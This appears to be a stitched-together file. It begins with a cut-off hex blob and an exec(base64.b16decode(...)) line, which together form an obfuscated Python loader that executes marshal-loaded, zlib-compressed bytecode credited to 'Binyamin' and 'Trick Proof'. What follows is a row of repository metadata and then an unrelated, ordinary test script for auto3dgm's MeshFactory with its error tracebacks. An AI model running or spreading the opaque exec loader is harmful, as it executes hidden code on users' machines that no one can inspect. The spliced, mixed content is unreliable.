375C7831615C7866305C7838625C7839395C78646654225C7839666C47535C7861325C7863355C78636258695C7864355C7861373C225C783031715C7830335C7830325C786363675C786163395C786434755C7862645C7862355F5C7861665C783133785C7830325C7864665C7838615C7863385C7839385C7861345C7861626A5C7866385C7865355C783036715C7862335C7830375C7831345C786261515C7866635C7865625C7831305C7864395C786231575C7866636B5C7863395C7862395C7866325C783033565C786434445C7865635C786630245C783036363C6441535C7839315C786162765C783838426169495C783133465C7863385C7831345C7839375C7863613A565C7839335C7862345C7861395C7839375C7838387933635C78313847575C7866625C7866322D5C786233505C7863345C786465254C5C7863345C7861325C7863655C783936365C7830626372225C7862625C7838665C7861335C78383847295C7864644A653574435C783033745C783134315C7866355C786263625C7861327A5C783066635C7839665C786439735C7831615C7862385C7864375C7865635C7863315C7839635C7838625C7839395C7831396B745C783961263C5C7863365C786332665C7861667567665C6E5C7830305C7861327D7D7C5C7866305C7865345C7863355C7862315C7865363B5C786239405C7864335C7838385C7866625C7863344F5C7862635C7864385C72236E33215C7863305C7862665A5C7863385C7862395C7839374B78265C7862645C7866655C7831327A525C7864615C5C232D5C7831355C7864385C7865355C7838315C786338495C783866785C783130305C7831625C7862625C7861345C7866635C7831395C7865665C5C5C7863655C7839635C786561305C7865325C7830625C786331225C7838305F5C7863343C4E5C783964265C7830385C7864395C7861614B4F5C7862305C78643861535C6E5C7863325C78623020456A535C7830355C7861385C7865655C7838325C786163755C783138206C69355C7830312F355C786539465C7861325C7839633F5C7839615C7839305C7865335C7861355C7831622B5C7866355A5C7861612A5C7838385C7865345C7863365C7865305C7863325C7839345C7839615C7864615C7866345C786132695C786235522B2E5C7830305C7831342A5C7839645C7863375C7863655C7866355B5B5C7839353D5C7830655C7866365C7861345C7861665C7830384B5C783137615C7862394C5C7838395C7864335C786531365C7838633F525C7864625C7838625C7866335C6E265C7866355C7838655C7830375C7865305A5C7862345C7862367B5C786164495C7864625C7839355C783133225C7831365C2751406C5C7831365C7863335C7839324E2E405C7864615C7862635F5C783832625C7864395C7863356A5C7864395C786237405C7862355C7864305C7864635C786330615C7863625C7861365C7864622A5C7862615C783937635C7862325C786434225C7831367A5C786434664D5C7866355C7864315C783936505C7862375C7864635C7838655C786661465C7865665C7866375C7863665C7862375C7863345C7865335C7839655C7861666E5C783839386A5C7866367B5C7865645C7862375C786164745C786432525C7838612F5C74745F5C7863645C7862615C7864365C7839395C7865386A5C786137206855775C7863332272635C7864365C5C5C7862365C786435375C7838315C7839615C7865625C7831335C6E5C786162795C7838645C786636475C7863315C7831395C6E7E4D5C7864615C783034295C7861305C7861667667326B5C7861645C7866375C7865365C7831625C786163562B41555C7864375C7866347E5C7865365C7864645C7862385C783939596A5C7831645C7863395C7864325C783932563E565C7863325C7862345C786564315C7831615C783831705C7839665C786531435C7862653C5C7866645C7865325C7839345C7863385C7864375C7862615C786337677C5C7861635C7861326F4D78705C783936295C786666485C786636695C7839325C7866615C727E5C786265215C7865345C7838365C7864635C7863305C7831665C7839312F5C7866325C783033466E5C7863635C7839366C5C7865325C7838385C786239365C783032737E5C7830315C7865665C7839325C7861377973774E5C7863655C7830373F4D535C7838655C7861305C7830345D5C7862395C7866345C783864295C745C7864655C7861343D5C7866355C7866615C7866365C7838335C7839665C7866615C7865645F5C786665465C7830655C783932785C78636522605C7862344F5C7830655C7864645C7865305C7838615C7866616E205C7866625C786266705C786533675C783839255C7866625C786537715C7831635C7838615C7866646E775C7865365C7863365C7866335C7863345C7864326C5C786565635C7831325C7839305C7861345C7864625C7866305C7831325C786238725C7863325C78616678725C783936585C7830635C275C783963455C7861657D415E465C7839634F5C7865355C7864302158505C7838343C2E5C7866315C7838615C78393124445C6E5C7863645C786361465C7839315C7866315C78613768413E5C7866305C7861305C78653752405C7862385C783137725C7862625C7863372E5C7862635C783031785C786366555C725C7838373B5C7861615C786136655F5C783161515C27295C783163395C786332515C783132225C7831365C786433385C7861665C7862635C7838395C7863656F5C7866665C7866345C7864625C745C7866395C7839325C786366205C7839365C7839305C7839335C783830286D5C7864655C7865613C5C7862655C7830625C7863615C7863375C7865625C7839385C7861625C7864372D6A5C7865335C7839327A5D2436465C786335695C7865325C7861315C7830345C7839335C7862615C7831645A5C7865395C7830625C7862665C7831305C7865395C7838625C7865625C7861345C786466525C7865362B5C78626640715C7831655C7865395C786631415C7830305C7831375C725C7863305C7862305C7837665C7865315C7862385C78313124285C7861645C7863627D5C7862375C7861625C7865315C7861335C7861345C783034595C783161387D554A5C7830315C7866385C5C5C7838355C7831395C7830375C7865365C745C7862365F5C7865365C7839355C7861375A3B245C7863305C7863665C783161245C7866385F5C7830625C786166485C7863365C7866645C786434775C7861315C7861355C7862345C7864653F675C7839355C7831395C786632795C7861355C783139575C7862395C7866385C7861395C7838655C786436465C7831645C7864375C7864343A5C78383420735C7866315C7838324E5D5C783861795C7866625C786533345C7866343E455C7863335C786361425C7831655C78626664735C786538615C7864315C7863335C7831345C7861655C786230295C7865625C7865655C7861645C7865395C7865657D585C7866375C7861665C7839325C7863385C7861325C7863315C7837665C7864315C7861625C7864395C7830325C7865395C7864375C7838337D5C7839625C7863642E5C7861625C7831385C7861655C7861395C7831387E585C78633529755C786166695C7862305C786130735C7838667E5C7839345C7839653E5C7830625C7839324F5C7864315C7862345C7862634E486D5C7839665C7830365C7830665C7864335C7862353C5C786266345C786233245C78386554396D5C7865665C786537755C7863345A7A5C786139492B405C7864325C7865325C7831372C5C7831655C7863625C7863325C783132235C7838665C7830365C7830315C7830385C783836352C5C783865305C7861395C7865355C7865355C786462695C786136796D235C78616634325C7863395C7863615C7865355C7830635C786638612D7C493D5C786437515C7864365C7865395C7866335C7861615C7831395C7839375C786139245C7863635E6B5C783964345C7861665C786563525C7839625C7839355C7865345C78653531565C783163455C7862355C7830365C78623579532D3243445C7863335C786239365C7838353A5C7863305C7838325C7865325D665C7830385C7839667D4E655C78613433515C786431605C7861635C7862365C7861355C7863325C7862385C7831615C7830353E585C7866316B585C7861645C78383926305C786436625C7862365C783934435C7830315C786635715C7839345C7839655C7861625C7866305C786336305C7831385C78643764385C7838345C7830655C7864375C78633166665C7839365C7865375C7865635C786561635C786564725C7831325C7831335C7863315C7839382F483C5C786137315C7862395C786532495C7830345C7839355C7839635C7863645C7831335C7861385C7866385C7865302C42285C7862315C7865375C783063525C783131475C7866615C7839665C7864306A5C7839395C7861305C7831625C7861615B5C786164525C7864365C7865655C7861665C7862625C7831315C786232315C786434425C7838325C7830345C7839385C783832625C7831365C7830352C2676315C783033455C783934656B5C7831395B5C7838615C7864345C7831625C7866305C783938555C786232585C7862305C7861635C7861615C7864615C7864623F5C7866667E427E5C745C7865365C7838345C7866345C7861625C7862345C7864315C7863326D5C7838355C7861633F4A5C7838355C7866615C7865345C74215C7839325C786461755C7861615C7862345C7830355C786539505C7866665C7862395C7862325C7839645C786237565C7866337B5C783133725C783134615C7862327B5C7830317B5C7861305C7863345C7864375C7839385C7839305C786437215C7831655C7830365C7863395C7865315C786530355C7838305C7839357B5C7861355C7863315C7866655C7838343C5C7865355C7839655C7863375C783137305C7838625C7839635C7830365C786534695C7838365C7861345C7831325C786339405C7861365D725C7839615C7863345C7861354E3D2D5C7864385C7864662B5C7831665C783935762B555C786631695C7831335C7861636E5C7863662D79425C5C5C7839386E5C783130265C7839385C7864665C783033426E5C7866665C7866385C7839625C7837667D5C7866665C7863335C7838665C7837665C7866665C7866315C7831665C7862375C7864665C7866645C7830305C7831665C7837665C7866385C7864645C786564775C7862665C7866655C7865375C7866375C786466226B305C7862305C7830625C786335234E5C7831622B4A5C7865315C7862375C7866345C7865345C7866305C7864345C783835435C7831345C7831345C72365C783866225C7866305C783935775C7838355C7861652A5C7831365C7861665C7863315C7838315C7862365C7839385C7864615C783933736D345C7839335C7839395C7838355C7838655C786235715C7830335C7863375C786437235C7839322A235C7831325C783134283F7B765C7866615C7865325C7831385C783031565C783839585C783139585C786535305C7830362E5C7865355C7830655C7838396A3B5C7865393069345C7830385C786434725C7863345C786636785C7863303E5C5C5C786464215C7862375C725C7830625C7866615C7839375C786439622B5C7862315C7863615C7865625C7863615C6E455C7862655C786135366A22285C7866335C783165285C7866635C7864355C7839655C7862655C7861355C7839365C786462465C7861355C7864645C7861665C7862345C7830375C7839355C7866365C7862305C7864325C7864655C7861395C786234475C7839355C7866366E5C7861355C78626457695C7866375C7866344A5C7830375C7865635C7838345C7830375C786235615B435C7831635C7838635C7831335C7838665C7861365C7838375C7864385C7831635C7865375C7865345C7831395C7838345C783939435C7830365C786331395C7864645C7830305C78306579555C7864345C7838305C786465555C7863655C7861325C7831345C5C5C7838635C7862625C7863365C7863655D5C7838375C783136465C7866375C7864643D5C7837662B5C7831355C7830635C7866355C7865666248593A5C7862336D4C385C7838355C7863665C7831375C7838625C7863357A5C7864345C7863655C786565475C7838367B7A6F5C7864305C7831625C725C786261215C7838375C7864385C7864353576465C786133515C7862665C7830665C7866643B5C7866645C7864645C78316428673E5C7831375C78383925625C7831655D5C7839395C78663264395C7864365C783162345C7830635C786337535C786362535C7865656A5C7864335C7863625C786261365C7830317D5C786230415C786338525C786434555C7863615C7830385A595A5C786331485C7838305C786637325C786132645C7863375C7861615C7866655C7862615C78646363595C7861384C6B5C7838345C7830376C5C7864375C7865635C7863305D5C7864615C786131307D5C786536715C7838627A445C7865365C7862315C783966365C7862355C7866665C7830665C7862325C78663826715C7863625C786439225C78643575655C7838305C7839355C7866655C7861355C783838695C7864395C7866336A5C7863343C5C7862665C7866645C7866365C7861665C783133385C7865625C7838315C7831665C786338315C7865362B505C7838315C7862635C783861695C7831345C786166225C7861365C7839635C783936455C7863635C7838645C7864393A5C7862625C7866615C7864335C7865303B5C786264692B5C783033745C7863365C7866395C786363635C7831325C783965305C7866655C7862395C7861305C7865335C78623821205C7838645C7864626C5C7862636056235C7862325C7865335C7866315C7864625C7830365C7838635C7838633F705C7862365C7865636E5C7866355C7839665C7866615B5C7866645C275C7862645C78633625735C7863365C7830365C7839645C7862667E7E5C7862637077475C7839375C7863665C7861643D5C786662253F5C7839385C783766735C7862325C7865345C7861665C7839663F3B332E5C7830655F5C7831635C7837665C7866355C7866345C7865645C7863315C7830315C7839627D75727878705C786438485C7863346C7C707A5C7866395C725D5C7866345E5C7862635C7830656D5C7866645C7865325C7863324C5C7863635C275C7864315C7865385C783964713D5C7864385C7862643E5C786561356C31775C783964716F5C7862385C7830625B445C7865665C7831625C7838335C7865317047295C7865615C7839305C7863635C786334393C5C7861305C7861345C7866315C5C5C7838315C7864375C7838615C7864395C783935225C7831325C786361535C7861375C7865375C7830365C7866325C783165445C783161215C7861355A415C7830375C7830375C783835745C783833645C7861315C7863315C783936635C7838315C7864335C7863346E387D462E5C7839345C7864392D5C745C7866392A5C786261322154795C7862665C7838355C783964645C7861305C7830663A245C7830345C7866335C7830625C78383645395C786131335C7865615C7830362A5C7839325C7861657C5C7861625C7838326F5C7861627E5C7866645C7838325C783933435C7863635C7865645C7831335C7865395C7862355C7864615C7864615C7839365C7863655C7839635C7839635C7865655C7862625C7864355C7863385C7863376D5C7862635C6E5C7866616A5C786362255C7864652E5C7865315C7831645C7839345C272D5C7838315C7839615C7863315C7864365C7830375C7838335C7861355C7830355C7863615C7831395C783866615C275C7839653C5C783131585C7861345C783030315C7865655C7862645C786632255C786430305C78613757535C7866615C7839375C7861395C7861655C7830625C7865615C7863365C786130787A315C78383945565C783934405C7838325C7838335C7861337C5C7862365C7861355C7865655C7865332137265C7861305C7839615C783837785C786162215C275C7861375C783936393A5C7866625C7866614B2C5C7864395C7838325C7861637D5C7862645C7839395C7863625C7861365C7838325C745C72585C7861665C7863395C7864335C7830325C7831385C786266495C7861335C783939746D5C783136645C7865635C7864305C7865615C7866305C7830625C7838317B43305C7862635C7863385C7838365C7866315C7831325C7838325C7838615C7863335C7839332A5C78653825534B7E2F5C7838654A5C786538775C7862633C5F4D5C7861325C7830665C7861395C7864665C786435362E5C786463565C7862625C7866375C7839365C786631356B5C7862645C7838655C786137455C7831352F5C7831375C7865655C7863315C786138755C7861654C5C786464485C78633426565C7866335C7863615C7861345C7861645C7866345C7838633E5C7862615C7862625C783036795C7831305C7861355C786239775C7864665B5C78646234745C7861625C7830375C6E5C783038694E5C783937265C7866315C7831635C7831365C7839635C7862395C7863315C78626160465C783766345C7831615C7865655C7865645C7865397B5C7863335C7862645C7864655C786365705C786238655C7830635C7838645C7865315C786538485C7839665C7866365C7830363A5C7861355C783136735C7861365C7864365C7863655C7839305C7864615C7863365C7838385C7838655C7866617B5C7863635C786539515C7863335C7864385C7865395B5C7862645C7830365C7865633A5C783966425C7830305C783031355C7831615C7863325C786239302F59245C7830305C783833635C7861335C7863315C7863302D5C7864655869375C7864315C7830655C7861645C7862365C7864325C7866305C7862384D3D36665C7838315C7866395C786661555C783033355C5C5C7866305C786338415C7830325C7861392D525C7830305C7838335C7862315C78636245635C7863365C7830325C7830365C7839355C783030335C7830355C7864655C7837665C7866335C7863304C5C7837665C7864325C7831305C7865335E435C7862385C786233715C7837663A5C7831635C7830655C7861377B7B20526F6A3B234A757B305C7839385C783065775C786137435C786333605C78643334705C7864345C7864655C7839355C7861645C786462445C7838335C7863396E5C786438696A59715C7831355C7866375C7864325C7862623428645C7866625C7866635C7863645C786232675C7839645C7866375C7831655C7865665C7831395C7866655C7866395C7861615C7864325C7839385C7863385E5C7864645C272A695C7831335C7838395C786139365C7862635C7864655C7863385C7861365440725C7830305C7863385C78653571455C7862613F555C725C7838375C7866325C7839645C7839634A502D5C78316352295C7863655C7831355C7838365C786438337D31532629715C7831317B5C7838655C783861535C7864365C7865345C786664225C7864345C786563505C7831345C7862665C786238205C7862615C7862625C7861625C7830335A5C7866395C7830375C7839385C783963365C7862625C7831645C7839365C7865322A374A2A725C78316232535C7839395C7830364A5D5C7863315C783961455C783837755C7838665C783932252D255C7838365C725C783130445C7831395C7865645C7865655C7863305C7839665C7839325C7866365C7866655C7864665C7830315C7864375C7866385C7863395C7838317B2F745C7864665C7830665C7864655C7866665C7830635C786265465C786336635C7831335C7838305C7838646C5C7866355C783932735C7831665C7830385C7865325C7830375C786331385C7831375C78653541405C7862655C7831375C786361465C7831395C7863615C7831625C7863305C7862635C7831395C78636546315C7862617A5C7861613D455C786365285C7865375C6E484F205C7866335C786561375C786261665F5C7863375C7830345C7861365C786639346C625C7839655C7865615C783130485C7863365C783162335C7831615C786339536D5C783936205C783862535C7863665C7831315C7866375C7861315C7864345C786330735C7838665C7861635C5C2B575C7269263F7D5C7864653D7A296F5C7831635C7866325C7839635C7830665C7838656C5C783031345C7862625C7861625C7831655C7864305C7862335C7839352F5C7839645C7864375C783031305C745C7865615C745C7862365A5C7865635C7831355C7864385C7864395C783031465C7839625C7865635C725C7839335C7864374B5C7864375C7863645C7864355C786364245C7861625A655C7232265C7861615C7861656E3A5C7861645C786137505C7866615C7864304F5C786132755C786530635C7863615C786563675C7839615C7839325C783939695C7861325C7831354D5C783133795C7865325C7864647E5C7866645C786466373F5C7831384E285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929'))
import base64
exec(base64.b16decode('2320436F6D70696C6564204279203A2042696E79616D696E0A2320476974487562203A2068747470733A2F2F6769746875622E636F6D2F42696E79616D696E2D62696E6E690A2320596F7554756265204368616E6E656C203A20547269636B2050726F6F660A696D706F7274206D61727368616C0A65786563286D61727368616C2E6C6F6164732827635C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830305C7830335C7830305C7830305C783030405C7830305C7830305C78303073215C7830305C7830305C783030645C7830305C783030645C7830315C7830306C5C7830305C7830305A5C7830305C783030655C7830305C7830306A5C7830315C783030645C7830325C7830305C7838335C7830315C783030645C7830315C7830305C78303455645C7830315C78303053285C7830335C7830305C7830305C783030695C7866665C7866665C7866665C7866664E735C7839655C7830365C7830305C783030785C7839635C786335575B735C7864625C7862365C7831327E265C7837665C7830355C7863324E4D5C7861615C783936285C7838395C7862326C5C7863395C7831655C7866365C7838635C7839333A5C7838645C786137495C786134495C783963663A5C7838655C7838375C78303549505C78633231495C78623020585C7863355C7866395C7866355D5C7830302445495C7863655C7861355C786564435C786631205C7831315C7864385C7863355C786565622F5C7864665C7830325C7838323F5C7839635C7839625C7830385C7830365C7863645C6E5C7863365C78303562655C7862667C285C7866625C783832665C7861345C78316663415C7864345C7830375C786337795C7863635C7862325C7866655C7831615C7839375C7865625C7839345C7838367D4E5C786661625C7863645C745C783865695C7862655C7865615C7866665C78626664795C7862665C7865325C78613924445C7838635C78646453225C78626656445C7831345C7862382C5C7866625C7831395C7838395C786436385C7861375C783966405C7830365C7866395C786133225C786135285C7839355C7862325C7838345C7862335C78306365552A685C78633159445C7863615C783132245C7862395C7830356369635C7863365C7838645C7839325C7862665C7838345C7839352D5C783766235C786331255C78316623525C7830385C7863615C7866325C786232615C7837665C7863365C7866325C78396344725C7865395C783861735C7863363B3A5C7831615C7866645C725C786537535C78636536255C7865315C7861365C7839365C7838315C7861655C7864355C7861615C7864615C7861345C7864645C7863304A5C7831375C7863652F485C7865365C7864385C7830352D3C445C786633525C786530346D5C7839355C7864625C7862642F5C7862325C7862355C7866616A3E5C7865393E5C7862374C5C74295C7839635C7866315C7865315C7863655C7830375C786231665C7862395C7838375C78646337575C7839373F5C7862645C786261725C7862335C783138765C7839395C7839635C7861345C7830635C7863375C783065305C7866354C5C786638714B22625C78393260705C7831365C78633923267D5C7865655C7864385C78393548665C7863305C783162725C7865346F555C7862615C7866355C7864395C783163495C7839305C7864625C783032585C783866535C783132705C78313632513A5C786366715A5C7839325C7830335C7831614938295C7864375C786365564A5C7862305C7831365C786132705F5C7864635C7864632C5C786466685C786461525C7838375C7838385C7838315C7865307E5C7838363F5C7830365C7866324C5C786665585C745C786332715C7862635C783836385C7831315E5C783832215C7862375C7838655C7866645C7830655C7864345C7830662E57245C783137765C783166595C7838625C783832703C5C7839635C7862625C7862335C783131722E5C7866335C783938335C7831615F205C7862355C7838385E5C7864315C7839635C7830655C275C7839653B723D6F7A325C7839634D5D5C7866345C7865655C7830325C7864315C7862385C7838375C7839365C786130525C7862305C7861315C7865375C7838653D5C7866375C7863345C7839625C7861305F41385C786334755C7830385C7864335C7866315C7861395C7864355C786262335C7862375C7830655C7862345C7861325C783934606E5C7866355C7863635C7865665C786534402F5C7831373F2F5C7839305C78666134535C786236625C7862656D5C7864625C7865365C7861635C783165215C7830365C7864375C7863333F526336335C7839624F6B5C7831362A5C7863326C5C7839665C7864305C7839662D5C7865355C7831635C7865395C786239225C783034725C783063664B5B5C78313134455C7831315C7830366A5C7863635C7863327E5C7862625C786238235C786561775C786164435C7863625C7865395C783132705C78616443535C783134415C7838665C7861355C7838355A5C7838325C7861345C7839385C7838335C7862663D4C5C7831335D56624D384838474F695C7866655C783830335C7839615C7839625C786538672A5E545C7861315A5C7839345C7838312E5C7863665C7838375C7863335C7831355C7831355C7865622A74235C7839365C725C7863335C7839616F5C7830305C78316639355C7864316F5C7861635C7862615C78613942225C7862396F385C7838645C786565213C5C78386325267A5C6E5C7831652E5C783062263A525C7838345C7861345C7831375C7839325C7865635C78383635555C783861345C7866665C7838395C7865645C7865382B435C7838365C7864367C5C786336385C7838375C7861325C783937395C7839375C7865335C783863405C7830365A5C7838645C78663956435C5C5C7830325C7830386D5C7831385C7838665C7831355C7831315C7839362133585C7830315C7831335B5C7866305C7838615C7864385C786536664D535C7838325C7831635C7862645C7864385C7861635C786636345C7831325C7831345C7839635C7865365C7830325C7863394C525C7864336A5C7861625C7838365C7865334D405C7866335C7861325C7831325C7838655C7838356E5C7831365C7838625C7839375C7865385C7864645C7864625C786162375C7861662F5F5D5C783964234B5C783137394D5C7839305C7862335C7864645C7865305C7861333D536B5C72465C7862315C7862355C786565405C7865365C7866325C7866325C7865645C7864625C7866375C783862373F5C786235325C7831625C7862395C7864624D5C7861645C7864635C7865365C7839345C7862355C786463665C7865385C783133585C786538255B5C786164485C7830635C7831385C7838355C7863612A5C7839325C7861355C78396354695C7866615C783830705C745C7862345C7865335C786636603B5B5C783066715C7861625C7831395C7838645C7830335C7831335C78383926764B22307B5C5C5C7866627B5C7863655C7866325C7831356A5C7830335C7866315C7863345C7864615C7865315C7865615C7863305C7865315C7863377835605C7830355C7863395C7862665C78393651436F5C7865345C7838645C7838365C7861335C786339305C275C7839625C7830315C7838305C7865655C7830305C7864325C7839355C78653564205C7830385C7863665C7861615C7838665C7830335C7830314D635C783930303E487044425C786538485C7865655A645C7861395C7864645C7866625C7838635C7864615C783136445C7830654F5C7862317B5C783832365C7863663A5C275C7866385C7830665C7861635C7866665C7838635C786535725C7839385C7864305C2720725C7866375C7830655C7865345C78383121287C49545C7862365C5C5C7861626F5C7862395C786661475C786664765C786137775C7861365C7830315C7863615C7831305C7839335C7863395C786131765C7863304E435C7839645C7864625C7862313E5C7866305C7864625C7865333B5C7839393C5C786430725C786430755C7838655C786163635C7864365C7865625F5C7861385C7839362462565C7437492B5C7865385C7831635C7862645C7838625C78646464315C78306365472A5C786637395C7862645C7866645C7861655C786261635C786234682E5C7831666A5C7863325C7865655C7838395C7830305C7838335C7861355C7831335C783164695C7831635C7864385C7838385C7861635C7865655C7866393A525C7830655B675C783133415C7864645C7864375C7839645F5C7863385C7838335C7865615C7865615C7866645C7865625C7838355C7866615C7865665C78393446475C7830635C7863665C7864305C7838305C2748295C786662265C7831375C7865625C78393470242A5C7831632C5A5C7862375C7865335C7864615D5C7865383D202A5C7862615C786361304D5C7838375C7861665C7861622C5C7830345C7831305C7838366E5C7864625C7864365C7863305C7861313C5C7865625C7864365C7864625C7864397A5C7861395C7863615C7831345C7864645C7838304B5C786632435C7865655C7865395C7865385C7830376B5C78643059565C7861655C7830655C786132355C7861335C783131715C7866365C786432615C7839375C7861365C7839645C783130465C7865625D5C7863345C7866395C7839305C7830335C7839385C7866385C7866655C7838665C7861385C7838335F5C7838615C7863395C7862375C7861635C786664725C7830305B5C7839665C7864635C7861315C7865375C7831342E3B606D5C7861345C783031287D5C786438375C786337695C6E6A2B5C7863615C7862335C7831655C7838645C786331375C7862395C7831385C7861615C7863315C78656642245C786238525C7839305C783164375C7861315C7831375C7838345C7839335C7831645C786230545C7839355C7862305C7839355C7830305C7831395C7865625C7865665C7865365C7864365C7863365C786461255C7862625C7831624E5C78303571405C7864375C7864657A5C7839345C7862325C7862325C7865625C7864395C786461445C7831625C7865615C7865335C78633368325C7862395C7831645F5C7863635C7862645C7861635C7838655F5C7830376251433C5C7863625C7865635C786165595C783866415C7865625C7839375C783930645C7862335C7864395C7862385C783066605C78303734625C78383520515C7830375B5C783165475C7838365C7863665C783937475C275C7831655C7865334E3C545C7863635C7863365C7863652E486E5C783133685C786163205C7865355C7839315C7861305C7831395C7861615C7838345C72435C7838345C7864615C7862375C7862365C7866342D5C7864635C7866646C6E4B245C7866385C783961495C7863365C7831375C7863615C78643578545C7839665C7862315C7839335C7831655C7865645C7864345C7865655C7839385C725C7866375C7863305C7865625C7864375C7865385C7866645C7866355C7863645C7830625C7866345C7866635C7866325C7864395C7864355C7864335C7863355C7865325C783137645C7862375C7862635C7866304F695C78646349265C783139455C7861345C786162745C7861384A5C7866365C5C735C7830335C783133305C7862615C7839635C7831342940315C7865345C783163405C7861365C786236605C7831335C7866625C7866355C7866625C7863365C7861645C7866665C7862355C7839305C7862365C7863375C7864355C783132745C7830325C7831615C7830365C7862635C786133305C7831345C7831635C7864635C783937755C78666535715C725C7830375C7862385C7861306E5C7830625C786634325C7862345C7831395C7830312F5C786335435C783063373757795C7866655C783766585C78613553205C786431315C7866375C7862645C7863395C7864395C786439743E5C7831665C7863645C7861375C7866335C7866315C786539745C7866615C786264375C7866355C786136675C786366465C7863395C786638645C78383471485C786532243C5C7839645C7865325C7863383B5C786333675C783933395C7838395C7863375C7864385C7866334E5C275C7865315C7866385C783038203E5C7863335C7863325C7839374F5C7862355C786133325C7862655C7830665C7866655C786434776A5C7837667C445C7865345C7838317D5C7865625C7864385C7838315C7861625C7866375C786231755C7839345C7862325C7830385C7861375C7863345C27795C7866305C7865655C78656451735C7864315C78393064385C7862335C7861345C786333665C7839665C7862325C7866325C7830386E5C786638705C7838625C78313724285C7865355C7864625C7838645C7830315C7863305C7861385C7839375F5C745C7831324B5C7862615C7866325C275C786339743A4D5C7865367330675C783963445C7866315C7831395C7863365C7861335C7865385C786534245C7839395C7863655C7839325C7861395C7865375C7839315C786534545C7862395C7866315C7839335C7862325C786337555C7838665C7831645C786539215C7865355C7866335C7830345C7864395C7864645C7830335C7864625C783132633E5C7863395C5C5C7839305C7838312D5C7830665C7864625C786333465C7838395C7864325C7863345C7862617C3F5C7864645A5D5C7831315C7864365D5C7838375C78613329645C7862645C7866305C7838665C786361586F5C7864646F795C7866665C7862325C7838345C7866375C783035745C7866325C7866645B2A5C786462305C7866345C78633545735C7838335C7831332D5C7861395C7861665C783962585C783936725C7865345C7861644564715C783035595C7862395C7862325C7865655C7831615C7866365C7861655C275C78303050595C7830355F5C7866305C786432475C783138456B5C7830322632497A5C7864325C7831615C7866395C7862395C7864335C7865665C7861305C7838385E5C7865615C7831615C7864355C7864355C7839325C786562625C7839335C7831374F785C7866325C72517B5C7861335C786135255C7864615C7861385C7862625C7864365C78646656675C783938705C786561205C7839305C7866375C786233205C7830306C5C7830625C783032485C7865633C5C7830386A5C7838385C7861625B5C7864325F705C7864325C7864625C783132285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 4,075.285714 | 17,466 | 0.998563 | 24 | 28,527 | 1,186.833333 | 0.708333 | 0.000843 | 0.001123 | 0.001545 | 0.002177 | 0 | 0 | 0 | 0 | 0 | 0 | 0.860996 | 0.000596 | 28,527 | 7 | 17,467 | 4,075.285714 | 0.138092 | 0.00333 | 0 | 0.5 | 0 | 0 | 0.99701 | 0.99701 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
0e48d1fbbd1448264d9a934f33881052ceeebaa5 | 3,209 | py | Python | tests/mesh/meshfactory_realdatatest.py | ToothAndClaw/auto3dgm_nazar | c8202c964ebb8f8e2410bbd739bfb01d1ba4dcf4 | [
"MIT"
] | null | null | null | tests/mesh/meshfactory_realdatatest.py | ToothAndClaw/auto3dgm_nazar | c8202c964ebb8f8e2410bbd739bfb01d1ba4dcf4 | [
"MIT"
] | 9 | 2018-12-14T18:46:54.000Z | 2019-03-29T17:40:23.000Z | tests/mesh/meshfactory_realdatatest.py | ToothAndClaw/auto3dgm_nazar | c8202c964ebb8f8e2410bbd739bfb01d1ba4dcf4 | [
"MIT"
] | 4 | 2018-12-07T21:03:30.000Z | 2019-01-26T22:07:11.000Z | #Test script for the mesh factory
from auto3dgm_nazar.mesh.meshfactory import MeshFactory
#Test case 0: Giving out a non-sense file
#Conditions: filestring refers to a non existing file
#Expect: When I try to create a mesh, I get an error
filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/Non-existing file.ply'
MeshFactory.mesh_from_file(filestring)
'''
In [27]: filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/Non-existing file.ply'
In [28]: MeshFactory.mesh_from_file(filestring)
---------------------------------------------------------------------------
OSError Traceback (most recent call last)
<ipython-input-28-dce76620cc80> in <module>()
----> 1 MeshFactory.mesh_from_file(filestring)
/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/gitstuff/auto3dgm/auto3dgm/mesh/meshfactory.py in mesh_from_file(file_path)
52 msg = 'File {} not present or not allowed filetype: {}'.format(
53 file_path, ', '.join(allowed_filetypes))
---> 54 raise OSError(msg)
55
56 @staticmethod
OSError: File /home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/Non-existing file.ply not present or not allowed filetype: .ply, .obj, .stl
'''
# Result: Success!
#Test case 1: Giving out an invalid
#Conditions: filestring refers to a file type not supported
#Expect: When I try to create a mesh, I get an error
filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/.off'
MeshFactory.mesh_from_file(filestring)
'''
In [29]: filestring='/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/testdata/20_Test_Teeth_PLY/.off'
In [30]: MeshFactory.mesh_from_file(filestring)
---------------------------------------------------------------------------
OSError Traceback (most recent call last)
<ipython-input-30-dce76620cc80> in <module>()
----> 1 MeshFactory.mesh_from_file(filestring)
/home/safari/Desktop/tutkimus/Slicer/HackathonJAN/gitstuff/auto3dgm/auto3dgm/mesh/meshfactory.py in mesh_from_file(file_path)
52 msg = 'File {} not present or not allowed filetype: {}'.format(
53 file_path, ', '.join(allowed_filetypes))
---> 54 raise OSError(msg)
55
